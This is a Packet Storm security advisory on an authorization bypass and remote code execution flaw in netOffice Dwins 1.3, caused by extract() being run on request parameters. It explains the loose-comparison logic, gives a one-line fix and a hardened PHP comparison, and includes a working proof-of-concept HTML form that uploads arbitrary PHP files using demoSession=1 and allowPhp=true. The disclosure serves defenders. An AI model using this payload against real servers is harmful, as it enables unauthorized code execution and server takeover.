netoffice-exec.txt

Date: 03 Mar 2008 | Reported by: dB | Type: packetstorm | Source: packetstormsecurity.com

netOffice Dwins 1.3 Remote code execution vulnerability

netOffice Dwins 1.3 Remote code execution.
--------------------------------------------------------  
  
Product: netOffice Dwins  
Version: 1.3 p2  
Vendor: http://netofficedwins.sourceforge.net/  
Date: 02/29/08  
  
- Introduction  
  
"netOffice Dwins is a free web based time tracking, timesheet, and  
project management environment."  
  
- Details  
  
It is possible for an attacker to bypass authorization, upload arbitrary  
PHP files, and then execute them on the server.  
  
netOffice extracts all GET, POST, SESSION, SERVER, and COOKIE parameters
into the local variable space, so a request parameter can overwrite a
variable that was set from the session. This has the same effect as
enabling register_globals. The code below is from includes/library.php.
  
// GET array
if (!empty($_GET)) {
    extract($_GET);
} else if (!empty($HTTP_GET_VARS)) {
    extract($HTTP_GET_VARS);
}
  
This lets an attacker set demoSession=1 to bypass authorization and
freely access any part of the application. Under PHP's loose comparison
the string "1" is treated as true, so the first check ($demoSession != true)
evaluates to false and the session-validity block is skipped. The second
expression ($demoSession == 'true') is a comparison between two strings,
"1" and "true", and also evaluates to false, so the demo-mode block that
resets the action variable to an empty string never runs.
  
// check session validity, except for demo user
if (($checkSession == true) && ($demoSession != true)) {
    // a client user trying to get outside of the "client project site"
    if (($profilSession == 3) && (!strstr($_SERVER['PHP_SELF'], 'projects_site'))) {
        header('Location: ../index.php?session=false');
        exit;
    }
}

// disable actions if demo user logged in demo mode
if (!empty($action)) {
    if ($demoSession == 'true') {
        echo "true";
        $closeTopic = '';
        $addToSiteTask = '';
        $removeToSiteTask = '';
        $addToSiteTopic = '';
        $removeToSiteTopic = '';
        $addToSiteTeam = '';
        $removeToSiteTeam = '';
        $action = '';
        $msg = 'demo';
    }
}
  
Next, an attacker could access the uploadfile.php form without logging
in to upload and execute PHP files. Normally PHP files are not allowed
unless the allowPhp variable is set to true, but that variable is
populated through the same extract() call and can be supplied in the
request.
  
- Proof of Concept  
  
<form accept-charset="UNKNOWN" method="POST"  
action="http://target/netoffice/projects_site/uploadfile.php?demoSession=1&allowPhp=true&action=add&project=&task=#filedetailsAnchor"  
name="feeedback" enctype="multipart/form-data">  
<input type="hidden" name="MAX_FILE_SIZE" value="100000000"><input  
type="hidden" name="maxCustom" value="">  
<table cellpadding="3" cellspacing="0" border="0">  
<tr><th colspan="2">Upload Form</th></tr>  
<tr><th>Comments :</th><td><textarea cols="60" name="commentsField"  
rows="6"></textarea></td></tr>  
<tr><th>Upload :</th><td><input size="35" value="" name="upload"  
type="file"></td></tr>  
<tr><th>&nbsp;</th><td><input name="submit" type="submit"  
value="Save"><br><br></td></tr></table>  
</form>  
  
- Solution  
  
Authors were notified on 2/19; no fix is currently available. Edit
the source to prevent the authorization bypass.
  
In includes/library.php change

    if ($demoSession == 'true') {

to

    if ($demoSession == true) {
  
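To make the comparison semantics concrete, the following PHP is an added illustration (not netOffice code) that reproduces the two checks from the Details section under PHP's loose comparison rules, beside a hardened variant that reads request input explicitly and compares strictly; the hardened form goes beyond the one-line change above, and the function names and request array are constructed.

```php
<?php
// Added example, not netOffice code: reproduces the two checks quoted from
// includes/library.php under PHP's loose comparison rules, beside a hardened
// variant. Function names and the request array are constructed for this page.

// Vulnerable shape: extract() on request data clobbers the session-derived
// $demoSession that both checks rely on.
function vulnerableGate(array $get, bool $checkSession, bool $demoSession): array
{
    $action = '';
    extract($get); // same effect as register_globals: $demoSession and $action now come from the request

    // "1" != true is false under loose comparison, so the session-validity block is skipped
    $sessionChecked = (($checkSession == true) && ($demoSession != true));

    // "1" == 'true' compares two strings and is false, so $action is never reset
    if (!empty($action) && ($demoSession == 'true')) {
        $action = '';
    }
    return ['sessionChecked' => $sessionChecked, 'action' => $action];
}

// Hardened shape (beyond the advisory's one-line fix): read request input
// explicitly so session state stays authoritative, and compare strictly.
function hardenedGate(array $get, bool $checkSession, bool $demoSession): array
{
    $action = (string) ($get['action'] ?? '');

    $sessionChecked = ($checkSession === true && $demoSession !== true);

    if ($action !== '' && $demoSession === true) {
        $action = '';
    }
    return ['sessionChecked' => $sessionChecked, 'action' => $action];
}

// Constructed request matching the advisory's query string: demoSession=1&action=add
$request = ['demoSession' => '1', 'action' => 'add'];

$vuln = vulnerableGate($request, true, false); // session says: not a demo user
$hard = hardenedGate($request, true, false);
$demo = hardenedGate($request, true, true);    // session says: demo user

if ($vuln['sessionChecked'] !== false || $vuln['action'] !== 'add') {
    throw new RuntimeException('expected the request value to skip the session check and keep its action');
}
if ($hard['sessionChecked'] !== true || $hard['action'] !== 'add') {
    throw new RuntimeException('hardened gate must enforce the session check for a real user');
}
if ($demo['action'] !== '') {
    throw new RuntimeException('hardened gate must clear actions for a demo user');
}
echo "ok\n";
```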
Author: dB  
Email: dB [at] rawsecurity.org  
  
